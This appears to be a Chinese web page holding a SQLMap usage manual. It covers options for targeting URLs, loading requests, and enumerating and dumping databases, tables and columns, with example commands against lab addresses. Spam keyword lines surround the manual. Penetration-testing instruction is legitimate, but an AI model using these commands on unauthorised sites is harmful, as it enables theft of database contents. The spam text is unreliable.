91超碰碰碰碰久久久久久综合_超碰av人澡人澡人澡人澡人掠_国产黄大片在线观看画质优化_txt小说免费全本

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

SqlMap使用手冊

發布時間:2020-07-25 11:03:22 來源:網絡 閱讀:1328 作者:nw01f 欄目:數據庫

0x00 SQLMAP簡介

  • sqlmap是一種開源的***測試工具,可以自動檢測和利用SQL注入漏洞以及接入該數據庫的服務器。它擁有非常大的檢測引擎、具有多種特性的***實測器、通過數據庫指紋提取訪問底層文件系統并通過外帶連接執行命令。

  • 支持的數據庫:mysql,oracle,PostgreSQL,Microsoft SQL Server,Microsoft Access,IBM DB2,SQLite,Firebird,Sybase and SAP MaxDB

  • SQL注入技術:錯誤注入,基于時間的錯誤注入,報錯注入,union注入

  • 枚舉數據:users,password hasher,privileges,roles,databases,tables and columns


0x01 Sqlmap掃描等級(共有7個等級,默認為1)

  • 0、只顯示python錯誤以及嚴重的信息

  • 1、同時顯示基本信息和警告信息。(默認)

  • 2、同時顯示debug信息

  • 3、同時顯示注入的payload

  • 4、同時顯示HTTP請求

  • 5、同時顯示HTTP響應頭

  • 6、同時顯示HTTP響應面


0x02 獲取目標方式

  • 參數:-u 或 --url

eg:python sqlmap.py -u http(s)://targeturl[:port]/[...]


0x03 從文本中獲取多個目標掃描

  • 參數:-m

  • 文件中保存url格式如下,sqlmap會一個一個檢測

www.target1.com/vuln1.php?q=foobar

www.target2.com/vuln2.asp?id=1

www.target3.com/vuln3/id/1*

0x04 從文件中加載HTTP請求

  • 參數: -r

  • sqlmap可以從一個文本中獲取HTTP請求,這樣就可以跳過設置一些其他參數(比如cookie,POST數據,等等)。

POST /vuln.php HTTP/1.1
Host: www.target.com
User-Agent: Mozilla/4.0

id=1

0x05 POST方式注入

  • 參數: --data

  • 此參數是吧數據以post方式提交,sqlmap會像檢測GET參數一樣檢測POST的參數。

eg:python sqlmap.py -u "http://www.target.com/vuln.php" --data="id=1"

0x06 設定超時時間

  • 參數: --timeout

  • 可以設定一個HTTP(S)請求超過多久判定為超時,10.5表示10.5秒,默認是30秒。


0x07 設定重試超時

  • 參數: --retries

  • 當HTTP(S)超時時,可以設定重新嘗試連接次數,默認是3次


0x08 測試參數

  • *

  • 在偽靜態注入測試時,sqlmap無法直接使用測試參數,可以在想測試參數的參數后面加*

eg:
1.python sqlmap.py -u "http://targeturl/param1/value1*/param2/value2/"

2.python sqlmap.py -u "http://targeturl/param1/value1/param2/value2/15*"

0x09 列舉數據庫系統的數據庫

  • 參數:--dbs

  • 當前用戶有權限讀取包含所有數據庫列表信息的表中的時候,即可列出所有的數據庫。


0x10 列舉數據庫表

  • 參數: --tables -D

  • 列舉指定數據庫 -D xxxx 的所有表。如果不指定-D 則列舉所有數據庫中的所有表。


0x11 列舉書庫表中的字段


  • 參數:--columns -T -D

  • 列舉指定數庫,指定表中的字段。

eg:
python sqlmap.py -u "http://192.168.136.131/sqlmap/sqlite/get_int.php?id=1" --columns -D testdb -T users
[...]
Database: SQLite_masterdb
Table: users
[3 columns]
+---------+---------+
| Column  | Type    |
+---------+---------+
| id      | INTEGER |
| name    | TEXT    |
| surname | TEXT    |
+---------+---------+

0x12 獲取表中數據個數

  • 參數: --count

  • 列舉指定數據庫表中的數據個數。

eg:
python sqlmap.py -u "http://192.168.21.129/sqlmap/mssql/iis/get_int.asp?id=1" --count -D testdb
[...]
Database: testdb
+----------------+---------+
| Table          | Entries |
+----------------+---------+
| dbo.users      | 4       |
| dbo.users_blob | 2       |
+----------------+---------+

0x13 獲取整個表的數據或某幾個字段的數據。

  • --dump -D -T -C

  • 列舉某個數據庫某個表的所有字段

python sqlmap.py -u http://192.168.21.129/sqlmap/mssql/iis/get_int.asp?id=1 --dump -D testdb -T dbo.users
  • 列舉某個數據庫的某個表的某個字段的數據。

python sqlmap.py -u http://192.168.21.129/sqlmap/mssql/iis/get_int.asp?id=1 --dump -D testdb -T dbo.users -C ID,NAME


向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

任丘市| 莱州市| 宜兴市| 揭西县| 汶川县| 宣恩县| 兴国县| 堆龙德庆县| 静安区| 锦屏县| 巨野县| 苏州市| 白银市| 恩施市| 西林县| 子长县| 精河县| 大名县| 鲜城| 建平县| 灌南县| 本溪市| 肃北| 榆林市| 米泉市| 昌都县| 尉氏县| 集贤县| 延川县| 聊城市| 元江| 齐河县| 盐池县| 兰考县| 榆社县| 炉霍县| 元氏县| 饶平县| 城固县| 霍林郭勒市| 从化市|